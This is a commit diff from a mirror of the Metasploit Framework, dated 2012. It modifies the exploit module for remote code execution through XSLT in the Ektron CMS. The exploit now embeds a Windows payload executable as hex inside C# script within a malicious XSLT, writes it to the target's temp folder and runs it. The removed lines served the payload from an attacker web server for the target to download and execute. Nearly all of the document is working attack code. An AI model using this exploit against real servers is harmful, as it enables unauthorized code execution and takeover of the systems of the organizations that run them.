infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

embeding payload on the c# script

unstable
jvazquez-r7 2012-12-04 17:44:55 +01:00
parent 3f3bdb8473
commit 5548bebb16
1 changed files with 17 additions and 83 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

100
modules/exploits/windows/http/ektron_xslt_exec.rb
View File

@ -11,7 +11,6 @@ require 'msf/core/exploit/file_dropper'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
@ -132,36 +131,6 @@ return "#{fingerprint}";
end end
# Handle incoming requests from the target
def on_request_uri(cli, request)
if (not @exe_data)
print_error("A request came in, but the EXE archive wasn't ready yet!")
return
end
if request.uri =~ /\.txt/
print_good("Sending the EXE payload to the target...")
send_response(cli, @exe_data)
@exe_sent = true
else
# Don't know the request, return not found
print_error("Don't care about this file, 404")
send_not_found(cli)
end
end
def lookup_lhost()
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address('50.50.50.50')
else
datastore['SRVHOST']
end
end
def uri_path def uri_path
uri_path = target_uri.path uri_path = target_uri.path
uri_path << "/" if uri_path[-1, 1] != "/" uri_path << "/" if uri_path[-1, 1] != "/"
@ -183,15 +152,12 @@ return "#{fingerprint}";
end end
def exploit def exploit
print_status("Generating the EXE Payload...")
@exe_data = generate_payload_exe
exename = rand_text_alpha(5 + rand(5))
resource_exe_uri = '/' + exename + '.txt'
service_exe = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_exe_uri}"
print_status("Generating the XSLT...") print_status("Generating the EXE Payload and the XSLT...")
exe_data = generate_payload_exe
exe_string = Rex::Text.to_hex(exe_data)
exename = rand_text_alpha(5 + rand(5))
fingerprint = rand_text_alpha(5 + rand(5)) fingerprint = rand_text_alpha(5 + rand(5))
payload_filename = rand_text_alpha(5 + rand(5))
xslt_data = <<-XSLT xslt_data = <<-XSLT
<?xml version='1.0'?> <?xml version='1.0'?>
<xsl:stylesheet version="1.0" <xsl:stylesheet version="1.0"
@ -202,12 +168,20 @@ xmlns:user="http://mycompany.com/mynamespace">
<![CDATA[ <![CDATA[
public string xml() public string xml()
{ {
System.Net.WebClient client = new System.Net.WebClient(); char[] charData = "#{exe_string}".ToCharArray();
client.DownloadFile(@"#{service_exe}", @"C:\\windows\\TEMP\\#{payload_filename}.txt"); string fileName = @"C:\\windows\\temp\\#{exename}.txt";
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
for (int i = 0; i < charData.Length; i++)
{
bw.Write( (byte) charData[i]);
}
bw.Close();
fs.Close();
System.Diagnostics.Process p = new System.Diagnostics.Process(); System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false; p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = @"C:\\windows\\TEMP\\#{payload_filename}.txt"; p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
p.Start(); p.Start();
return "#{fingerprint}"; return "#{fingerprint}";
} }
@ -218,30 +192,8 @@ return "#{fingerprint}";
</xsl:template> </xsl:template>
</xsl:stylesheet> </xsl:stylesheet>
XSLT XSLT
register_file_for_cleanup("#{payload_filename}.txt")
print_status("Setting up the Web Service...")
ssl_option = nil
if datastore['SSL']
ssl_option = datastore['SSL']
datastore['SSL'] = false
end
print_status("Starting up our web service on #{service_exe} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_exe_uri
}})
if ssl_option
datastore['SSL'] = ssl_option
end
print_status("Trying to run the xslt transformation...") print_status("Trying to run the xslt transformation...")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx", 'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
@ -254,32 +206,14 @@ return "#{fingerprint}";
'vars_post' => { 'vars_post' => {
"xml" => rand_text_alpha(5 + rand(5)), "xml" => rand_text_alpha(5 + rand(5)),
"xslt" => xslt_data "xslt" => xslt_data
}, }
}) })
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/ if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
print_good("Exploitation was successful") print_good("Exploitation was successful")
register_file_for_cleanup("#{exename}.txt")
else else
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request") fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
end end
# wait for the data to be sent
print_status("Waiting for the victim to request the EXE payload...")
waited = 0
while (not @exe_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Exploit::Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
end
end
print_status("Giving time to the payload to execute...")
select(nil, nil, nil, 20)
print_status("Shutting down the web service...")
stop_service
end end
end end